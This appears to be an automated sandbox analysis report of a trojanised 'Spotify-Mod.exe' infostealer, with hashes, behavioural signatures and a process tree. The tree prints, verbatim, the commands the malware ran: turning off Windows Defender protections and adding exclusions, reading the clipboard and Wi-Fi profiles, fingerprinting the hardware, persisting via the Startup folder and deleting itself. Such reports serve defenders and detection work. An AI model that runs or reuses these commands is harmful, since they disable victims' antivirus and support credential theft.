Analysis
max time kernel: 146s
max time network: 151s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 21/05/2024, 18:16
Behavioral task behavioral1: Sample cracked-premium-spotify.rar, Resource win11-20240508-en
Behavioral task behavioral2: Sample Spotify-Mod.exe, Resource win11-20240508-en
Behavioral task behavioral3: Sample Spotify-Mod.pyc, Resource win11-20240419-en
General
Target: Spotify-Mod.exe
Size: 26.1MB
MD5: 1228d25f5999f30e525ad94a791f0533
SHA1: 4c88fc73745428ba90de79ae5c045fed5dcbf48c
SHA256: 6e01da3a7bf0a42d5a29e7dbc7a0d64922dc276b747964f4371c8bd63c1627a7
SHA512: a7d7eeae8e7ee959f9878598829c29c76108f2a8b56dfbc57d4b71a03febaead8765b07ff0682d440d7815853ecaf9474c3b948eece2d0e3710b08eb9dae7fd4
SSDEEP: 393216:av90+5YjOfXh2Jp5MwurEUWjAtEh/1tSRtyV+da:M9PKjEhidb+O1QRt4+da
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid / Process: 564 powershell.exe; 4936 powershell.exe; 5108 powershell.exe
Drops startup file (1 IoC)
description / ioc / Process: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Spotify-Mod.exe by Spotify-Mod.exe
Loads dropped DLL (50 IoCs)
pid / Process: 5092 Spotify-Mod.exe (all 50 entries are from this process)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
resource / yara_rule: upx (matches on behavioral2 dropped files and memory regions of PID 5092)
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 6 IoCs)
flow / ioc: 7 discord.com; 8 discord.com; 1 raw.githubusercontent.com; 1 discord.com; 3 raw.githubusercontent.com; 5 discord.com
Looks up external IP address via web service (3 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow / ioc: 6 api.ipify.org; 1 api.ipify.org; 2 api.ipify.org
Detects videocard installed (1 TTP, 1 IoC)
Uses WMIC.exe to determine videocard installed.
pid / Process: 4984 WMIC.exe
Runs ping.exe (1 TTP, 2 IoCs)
pid / Process: 4816 PING.EXE; 2108 PING.EXE
Suspicious behavior: EnumeratesProcesses (22 IoCs)
pid / Process: 5092 Spotify-Mod.exe (12 entries); 3240 powershell.exe (2); 1448 powershell.exe (2); 564 powershell.exe (2); 4936 powershell.exe (2); 5108 powershell.exe (2)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description / pid / Process:
Token: SeDebugPrivilege 5092 Spotify-Mod.exe
3996 WMIC.exe (each token recorded twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Token: SeDebugPrivilege 3240 powershell.exe; 1448 powershell.exe; 564 powershell.exe; 4936 powershell.exe; 5108 powershell.exe
3716 WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
Suspicious use of WriteProcessMemory (48 IoCs)
description / pid / Process / procid_target (each entry recorded twice):
PID 4124 Spotify-Mod.exe wrote to memory of 5092 (target 81)
PID 5092 Spotify-Mod.exe wrote to memory of 3784 (83), 4580 (86), 2596 (89), 4476 (92), 4948 (98), 868 (101), 3060 (103), 1668 (106), 2080 (109), 3592 (112)
PID 3784 cmd.exe wrote to memory of 3996 (85)
PID 4580 cmd.exe wrote to memory of 712 (88)
PID 2596 cmd.exe wrote to memory of 3240 (91)
PID 4476 cmd.exe wrote to memory of 1448 (94), 564 (95), 4936 (96), 5108 (97)
PID 4948 cmd.exe wrote to memory of 3716 (100)
PID 3060 cmd.exe wrote to memory of 4984 (105)
PID 1668 cmd.exe wrote to memory of 3480 (108)
PID 2080 cmd.exe wrote to memory of 2700 (111)
PID 3592 cmd.exe wrote to memory of 4816 (114), 2108 (115)
Processes (indented by depth in the process tree)
C:\Users\Admin\AppData\Local\Temp\Spotify-Mod.exe (PID 4124)
  command: "C:\Users\Admin\AppData\Local\Temp\Spotify-Mod.exe"
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\Spotify-Mod.exe (PID 5092)
    command: "C:\Users\Admin\AppData\Local\Temp\Spotify-Mod.exe"
    - Drops startup file
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 3784)
      command: C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\wbem\WMIC.exe (PID 3996)
        command: C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe (PID 4580)
      command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\netsh.exe (PID 712)
        command: netsh wlan show profiles
    C:\Windows\system32\cmd.exe (PID 2596)
      command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3240)
        command: powershell Get-Clipboard
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe (PID 4476)
      command: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1448)
        command: powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 564)
        command: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4936)
        command: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5108)
        command: powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe (PID 4948)
      command: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\Wbem\WMIC.exe (PID 3716)
        command: wmic os get Caption
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\Wbem\wmic.exe (PID 868)
      command: wmic cpu get Name
    C:\Windows\system32\cmd.exe (PID 3060)
      command: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\Wbem\WMIC.exe (PID 4984)
        command: wmic path win32_VideoController get name
        - Detects videocard installed
    C:\Windows\system32\cmd.exe (PID 1668)
      command: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\Wbem\WMIC.exe (PID 3480)
        command: wmic computersystem get totalphysicalmemory
    C:\Windows\system32\cmd.exe (PID 2080)
      command: C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\wbem\WMIC.exe (PID 2700)
        command: C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
    C:\Windows\system32\cmd.exe (PID 3592)
      command: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\self_delete.bat"
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\PING.EXE (PID 4816)
        command: ping 127.0.0.1 -n 2
        - Runs ping.exe
      C:\Windows\system32\PING.EXE (PID 2108)
        command: ping 127.0.0.1 -n 2
        - Runs ping.exe
Network
MITRE ATT&CK Enterprise v15
Downloads